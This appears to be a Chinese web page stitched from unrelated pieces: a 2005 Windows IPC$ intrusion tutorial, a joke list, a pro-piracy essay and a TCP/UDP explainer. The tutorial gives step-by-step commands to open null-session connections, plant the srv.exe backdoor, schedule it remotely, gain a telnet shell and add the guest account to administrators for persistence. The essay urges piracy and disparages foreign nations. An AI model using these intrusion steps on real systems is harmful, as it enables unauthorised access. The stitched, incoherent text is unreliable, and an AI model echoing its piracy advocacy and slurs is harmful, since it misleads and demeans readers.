八 相关命令
1)建立空连接:
net use \IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

2)建立非空连接:
net use \IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

3)映射默认共享:
net use z: \IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \IP\c$

4)删除一个ipc$连接
net use \IP\ipc$ /del

5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认


九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

1. C:\>net use \127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
  
2. C:\>copy srv.exe \127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
  
3. C:\>net time \127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
  
4. C:\>at \127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
  
5. C:\>net time \127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
  
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
  
7.C:\>copy ntlm.exe \127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
  
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活

11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码

12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) 。

文版权属20CN网络安全小组及其作者所有,如有转载,请保持文章完整性并注明出处

2005年05月20日

问:当你给女友脱衣服的时候,有个扣子解不开,怎么办?

布什:这是世界防恐组织的耻辱,我们要不惜一切代价把这个扣子解开。我们已经派去大批特种部队,保证在3个月以内把扣子解开!

拉登:弄架飞机,务必要把扣子撞掉!

阿拉法特:我们绝不屈服!扣子已经强占我们的领土达24个小时!

沙龙:我可以毫不夸张的说!这颗扣子即使是上厕所也要通过我们的同意!

克灵顿:莱温斯基怎么没有这么个扣子呢?

李登辉:这是我们进行的有效吓阻的成果!

江领导:我们已经大幅度加高了扣子的工资,但它还是解不开!这是严重的腐败!

金庸:我以1元钱出让这个扣子的拍摄权给中央电视台!

古龙:好硬的扣子!他淡淡的抚摩着哪个扣子!天边露出一丝曙光……

温瑞安:哪个扣子!一飞冲天!

黄易:一阵光亮过后,这个扣子来到了秦朝!

卫斯理:这个扣子居然是外星来的!

卫惠:他还在拼命解这个扣子,但是我,已经湿了!

赵忠祥:在一望无际的衣服上,突然窜出了一只扣子,这只受伤的扣子在衣服上面挣扎着,然而大自然是残酷的,这只扣子终于消失在茫茫的衣服里。

倪萍:我很激动,然而这扣子对祖国来说是多么渺小啊!(落泪中!)

崔永元:公说公有理,婆说婆有理,扣子卡在衣服上,到底谁有理。我们现场请来这只扣子,让他来谈一谈卡在衣服上的亲身感受。

王小丫:这是幸运第一关!你做好准备了吗?好!请听题!(当!!!)你在给女友脱衣服时,突然有个扣子解不开了?怎么办?答案a她不脱我脱 答案b买一件没扣子的衣服!

贾博士:表面上看这个扣子是解不开了!但是为什么不能从反面来看呢!其实那件衣服也是解不开了嘛!

姜昆:我早知道扣子解不开,我就是不说;这么破的扣子解不开一点也不奇怪,如果解开了反而奇怪了。

雪村:翠花,上扣子。

赵本山:解扣子,选好药,选药也得有诀窍!别看广告!

赵薇:我为扣子无意中卡在衣服上给手机用户带来的心理负担道歉,其实在主观上我是不会将扣子卡在衣服上的,因为我祖宗八代都是扣子迷,绝对不会故意将扣子卡在衣服上的。

周瑜:既生扣子,何生衣服?

辣厘头:这个扣子纯属原创!如有雷同。实属巧合!

唐僧:这个扣子左宽右窄,前轻后重,扣上去极不舒服,可能会引起乳腺病变的;至于那件衣服,他一定会明白我佛慈悲的大无畏精神而回到我身边的,南无阿弥佗佛……

孙悟空(举着这个扣子):波罗波罗密!!!!!!!!!!!!

八戒:又解不开了!咦?我怎么会说又呢?

算命妇女:(看见扣子,跪倒在其面前)先生,你额头有朝天骨,眼里有灵光,仙人转世,神仙下凡,我终于等到你了。(扣子抬腿欲走)别动,虽然我泄露了天机,灾劫难免,可这是我命中注定,就算我要冒天大的危险,也要给你看个全相。

包龙兴:我不慎偷到一个龙扣子!望皇上赎罪!

韦小宝:各位观众,谢谢各位凑得这么近、站得这么直听我说书,真是太给面子啦。(小宝坐在叠着的几个桌子上)今天要说的人物就是天地会的总舵主扣子,有所谓平生不见扣子,便称英雄也枉然。他身高八尺,腰围也是八尺。!

众人:哇!那岂不是四方了吗?

韦小宝:四方就四方,四方的扣子都没见过真烂,八角形的都有,我告诉你!(搔首转身)他武功的名堂呢,称之为九天十地,菩萨摇头怕怕,劈雳金光雷电掌!一掌打出,方圆百里之内,不论人畜、虾蟹、跳蚤,全部都化成了飞灰啊!

韦春花:啊呀,老弟呀,我们是清白的!

多隆:我们是清白的!

李红志:这个扣子圆满了!

化学老师:请往扣子上倒硫酸,扣子会慢慢揭开来的。

电脑老师:首先,我们来格式化衣服,这样扣子跟衣服都会清除掉,然后重装衣服系统,在重装系统前请对口子做好备份。

物理老师:难道你们忘了利用杠杆原理吗!

哲学老师:我们要辨证的看这个扣子!

中国电信:我们已经开始降低解扣子的定价,前3分钟为0.30圆,以后每多一分钟多加0.02元;

中国联通:中国扣子,扣住中国!

搜狐:闪电邮件,还送扣子拉!

新浪:我们推出了周星驰和扣子的系列在线讨论!你可以登陆www.sina.com参加讨论!

网易:我们将周星驰出席我们的扣子-online的发布仪式!

中国万网:尊敬的客户,您好!您的问题经过我们对扣子的仔细测试,发现是解扣子的方式不对,所以请解开后重新扣起或者登陆衣服自行处理。

腾讯QQ:扣子行靓号地带最新推出用户自选扣子号码!从100000000到100999999,尽情挑选梦幻数组合,进行靓号、酷号大比拼,并享受全程会员服务!马上打http://club.tencent.com/qqs.shtml到"百万连号"选扣子号码!

微软:扣子解不开是扣子和衣服之间的兼容问题,请下载最新补丁或者升级您的衣服。

爱立信:这只扣子之解不开,只不过是我们的技术人员在作测试。

诺基亚:可能是因为这几款扣子没有外天线的原因,所以会导致扣子解不开。

奔驰:在此之前,我们已经通知该用户,扣子故障与该用户长期使用方言通话有关,但是该用户竟然公开将扣子解不开,对于这种行为我们保留起诉该用户的权利。

东芝:扣子出的问题是一个小bug,请美国用户到零售商领取赔偿金,请中国用户到本公司网站下载补丁!

恒升:扣子解不开不是本公司的问题,对于该用户非法在网络上发布对本公司不利的消息,本公司决定起诉该用户!

公安:解扣子,请打110;

税收:依法纳税是每一个扣子应尽的义务!

人大:人民扣子为人民!

无厘头:靠,怎么这么倒霉,正在紧要关头扣子解不开了!"撕拉"衣服给撕破了!……

说说盗版的事情,我个人其实对盗版没有任何的成见。我老实的说了,我支持盗版。在目前的这种状况下,我觉得盗版还非常有必要。为什么呢?先拿《珍珠港》来说说。这是一部纪念二战的片子,5 月25日全球发行,号称预算就是一亿五千万。我根据《拯救大兵瑞恩》的经验,当然想看。而且想到我居住的城市的大型院线里欣赏什么带T HX,什么杜比效果的。但是不可能。为什么呢?中影公司决定不引进该片。它不引进,我在电影院里就看不到。这就奇怪了,我想看什么片子居然要看一个公司的脸色,它决定引进什么不引进什么,而且没有第二家和它竞争,造成你不引进我引进的局面。
好,你不引进。那我买正版的VCD或者DVD行了吧?我甚至不要你的字幕,我猜!总可以了吧?答案还是不行。为什么呢?因为据说这样我就浪费了外汇了,进口这片子是要用美金的。那我不用外汇,我叫朋友从国外带可以了吗?这又不行,音响制品过海关的时候未必能过得掉,难说海关的比我还想看呢。现在我问你,秦先生,我想看一部全球都在放的片子,主题是抗日,内容上没有光话股,思想健康向上。为什么我就不能看呢?或者说,我怎么才能看呢?请你告诉我?
接下来,我想看《纽约时报》,这也是全球都有的报纸。我不敢要求看《花花公子》,虽然我心底里喜欢得要死。但是不行,因为谁知道我是不是"用批判的眼光看"?那东西涉及政治观点,不健康。好,那么我能不能看《读者文摘》?全风花雪月的。不行,那是美国人出的,要用外汇。那我看香港版的总可以了吧?香港总是我们自己的地方了吧?还是不行,因为我们是一国两制,制度不同,看的书也不能一样。《Y ES》这种中学生看的杂志都不能公开发行,还想看什么《读者文摘》?

那我上网,只看一眼,一眼总可以了吗?不行,"你所访问的服务器返回的信息错误或者不可识别,请与网络管理员联系。"本来文化的沟通和信息的共享是文明发展的重要方法,是好事。本来是两情相悦的事,好比结婚洞房。但是现在搞得和强奸一样,满耳朵听见的都是"不行"!"不要"!"不好"!我干什么了我?自由恋爱变成了居民委员会包办婚姻,合着我自己不能选择,他们牵个什么样的橘皮马脸的生物进来,我都得笑纳?还不准和路过的漂亮女青年搭讪?看看都不可以?

所以我当然盗版,必然盗版。这是第一个层面的问题。

我是一个技术人员,预报工程师。在网上我看见了外国出的一本气象学书,心里很喜欢,也看了介绍,很有用。等我看了定价:49美元,我的眼泪就下来了。4 9美元,大约等于400元人民币,而且是一本书。前些日子,我看到钱钟书的全集,很好的纸张,完美的印刷,讲了半天价,480元,人民币。我把手指甲都啃完了,还在犹豫买不买。别人一本书就是4 00,我买还是不买?

49美金,我如果在美国的话,只是我月薪的很小很小的一部分。看见了,喜欢上了,我掏钱就买。在大鼻子眼里,这书是便宜,一点不贵。而我拿的是人民币,八比一。这东西相当于一下子翻了八倍价钱,我怎么买?而且,这还不是我个人的能力问题。要是说我怂,我懒,所以拿钱少,我的确没话说。但是,我就算到了别的国家,也可以干一样的活。所以,买不起,不是我的错。我和别的国家的人做一样的事,但是无法具有一样的购买力。就因为这个,我不能去获得学术上的资料,等于是对我关闭了书库的大门。我错在什么地方了?

秦先生,我想问问你。你说我有没有发展自身的权利?我大概还是个人吧?我是不是有丰富自己头脑,开阔自己视野的权利?而且我也很努力了,对人类多少有点贡献。为什么我就是不能得到这个权利呢?是我的能力限制了我,还是其他的什么东西让我得不到自身发展的可能?你不觉得我的命运很可悲很可怜吗?我和别的人一样,会笑会哭会思维。只是因为我无法选择我的出生,因为我的经济地位不够高,所以当我想向世界投射好奇的一眼的时候,世界就在我眼前关了门?

作为一个生命,我对面前浩瀚的世界充满了好奇,想去了解更多一点,这不是什么罪过吧?而且人类的文明也正是沿着这样的轨迹发展起来的。获取知识是任何人的应该有的权利,不是吗?知识的取得需要付出金钱,我做了一个人能做的工作,也愿意用自己的劳动给予知识的拥有者以报酬,但是钱远远不够。这是谁的错?

我当然盗版本,我为什么不盗版?这是第二个层面的问题。

在我给你的回帖里,我说了关于非洲国家仿造AIDS药品的官司。西方国家的药品公司在药品研究的投入上是很大的,他们不愿意看见非洲国家不交一分钱的仿造他们的产品,因此大打官司。最近,他们集体撤诉了。为什么?因为西方的媒体上对他们进行了唾骂,非洲人分分钟都在死,他们需要药品。但是,他们的国家又是如此之穷,根本能用什么比索买到多少药品。那么非洲人活该去死吗?媒体大骂药厂的冷血,压力之下,他们终于放弃了。
我们现在整天说自己如何牛,怎么厉害。事实上我们的GDP分在每个人头上,有几个美金?我们还根本是一个穷国。在人类社会的班级里,我们属于差生。最急切的问题是如何发展起来,科学技术的引进非常重要。我现在想问问你,你用的电脑上的w indows是你多少钱买的?98的上市价是将近两千,秦先生自己花了两千?这个坛子里的朋友有几个是买的正版装在机器上的?

[晕倒死] 98在中国的价格居然和日本、欧洲国家的一样,甚至还要高一点点。这些国家是什么经济实力?我们是什么经济实力?这和非洲人买不起AIDS药品有什么不同?应该买正版,但是买不起。那么是不是别人用电脑,我们用阿巴克斯― ――算盘?西方国家和我们讲什么版权所有,我觉得是不是太贪婪一点了?我们种米,多少米能换他们一双尼龙袜?我们造袜子了,多少袜子能换他们一台汽车?我们造汽车了,多少汽车能换他们一片高级电脑芯片?我们在技术和经济上远远落后于他们。但是却要求我们用相同的游戏规则,而我们又不得不参加游戏。他们已经处在世界财富的顶端了,却不肯让一点利益给穷国,让他们发展一点,不至于差距太大。

中国落后了对世界有什么好处?对西方资本家有什么好处?我觉得与其那么喜欢钱,不如把版权单对中国提高100倍。等中国因为落后和人口膨胀以后,这世界才真精彩!我们随便送15亿人口从新疆出去,前往欧洲。这能形成100公里宽的一条大路,一年内欧洲将全都是中国人。所有能砍伐的树都砍光,能吃的吃光,甚至家猫都做了龙虎斗。西方国家其乐若何?
我当然同情盗版,肯定盗版!这是第三个层面的问题。

秦先生教导说,人穷志不穷,要有国格人格。我于是看了看世界历史,真还找不出几个有国格的国家来。英国,当年全国都是海盗,伊丽沙白二世是全英国的海盗头子,靠抢劫发家致富。法国,随着波拿巴的脚步,抢劫都抢到埃及了。美国,靠黑奴种棉花,在两次世界大战里卖军火帮人杀人暴富。俄国,抢了别国的出海口不说,甚至二战以后一直奴役东欧洲国家。著名的八国集团开会,警察满街,领导人人模狗样的,动辄文明、新经济。其实全是一帮流氓国家老大的集会。

这些国家靠的是什么发的家?是今天他们标榜的文明和民主吗?他们抢劫了全世界,捞得盆满钵满了,现在坐下来谈仁义道德了。要讲自由贸易了,要讲知识产权了。这就象是黑社会分子功成名就,最后还当上了立法委员,转过身来要大家爱和平,不要暴力。今天要知识产权,那么圆明园的赔偿呢?英国贩卖毒品的赔偿呢?巴拿马运河一家一半,那么中国的海关的收入呢?中国铁路和矿山的利润呢?能不能赔偿?

要说这些资本积累的过程是对的,没有任何过错。那对于一个中国人来说,意思就是我当年腿比你粗,你活该。既然活该,那你今天也活该被盗版。流氓都合法了,我们当当无赖又怎么了?对于流氓和强盗,就应该学学萨达姆和卡扎菲,以无赖的方法回敬。什么是国际道义?中国不贬值人民币,造成严重的出口衰退,这就是讲道义,讲国格的结果。

日本当年牺牲一代妇女,换取经济起飞。现在这个卖淫国家傲然屹立世界一流国家,美国人炸了我们大使馆,写个道歉声明就完了。美国潜水艇撞死几个日本渔民,美国政府专程派特使到卖肉国家道歉。这就是国格!

卖淫国家受到尊敬,这是值得我们思考的。我们盗版而传播普及科学和文化,善莫大焉。为了我们的人民过上好日子,中国的发展,当无赖又有什么的?美国人不高兴,我们去找欧洲人。欧洲人也不满意,大家都来制裁好了。全部和中国经济断交,我倒看哪个国家有如此勇气?大不了你不要我的袜子,老子还不买你的飞机呢,谁怕谁啊?别忘记了,上个世纪的经济大萧条有一个很重要的背景:俄国发生革命,等于是突然关闭了欧洲最大的市场。

秦先生,综上所述。我觉得盗版这东西非常好,如果有条件的话,我能用盗版就尽量不用正版。流氓的西方国家,我们对他们的盗版让我这个黄皮肤的穷人了解了世界,丰富了头脑,在进化树上往上大大的爬了一截,真是很大的功德!

现在Internet上流行的协议是TCP/IP协议,该协议中对低于1024的端口都有确切的定义,他们对应着Internet上一些常见的服务。这些常见的服务可以分为使用TCP端口(面向连接)和使用UDP端口(面向无连接)两种。
    说到TCP和UDP,首先要明白“连接”和“无连接”的含义,他们的关系可以用一个形象地比喻来说明,就是打电话和写信。两个人如果要通话,首先要建立连接——即打电话时的拨号,等待响应后——即接听电话后,才能相互传递信息,最后还要断开连接——即挂电话。写信就比较简单了,填写好收信人的地址后将信投入邮筒,收信人就可以收到了。从这个分析可以看出,建立连接可以在需要通信地双方建立一个传递信息的通道,在发送方发送请求连接信息接收方响应后,由于是在接受方响应后才开始传递信息,而且是在一个通道中传送,因此接受方能比较完整地收到发送方发出的信息,即信息传递的可靠性比较高。但也正因为需要建立连接,使资源开销加大(在建立连接前必须等待接受方响应,传输信息过程中必须确认信息是否传到及断开连接时发出相应的信号等),独占一个通道,在断开连接钱不能建立另一个连接,即两人在通话过程中第三方不能打入电话。而无连接是一开始就发送信息(严格说来,这是没有开始、结束的),只是一次性的传递,是先不需要接受方的响应,因而在一定程度上也无法保证信息传递的可靠性了,就像写信一样,我们只是将信寄出去,却不能保证收信人一定可以收到。
   TCP是面向连接的,有比较高的可靠性,   一些要求比较高的服务一般使用这个协议,如FTP、Telnet、SMTP、HTTP、POP3等,而UDP是面向无连接的,使用这个协议的常见服务有DNS、SNMP、QQ等。对于QQ必须另外说明一下,QQ2003以前是只使用UDP协议的,其服务器使用8000端口,侦听是否有信息传来,客户端使用4000端口,向外发送信息(这也就不难理解在一般的显IP的QQ版本中显示好友的IP地址信息中端口常为4000或其后续端口的原因了),即QQ程序既接受服务又提供服务,在以后的QQ版本中也支持使用TCP协议了。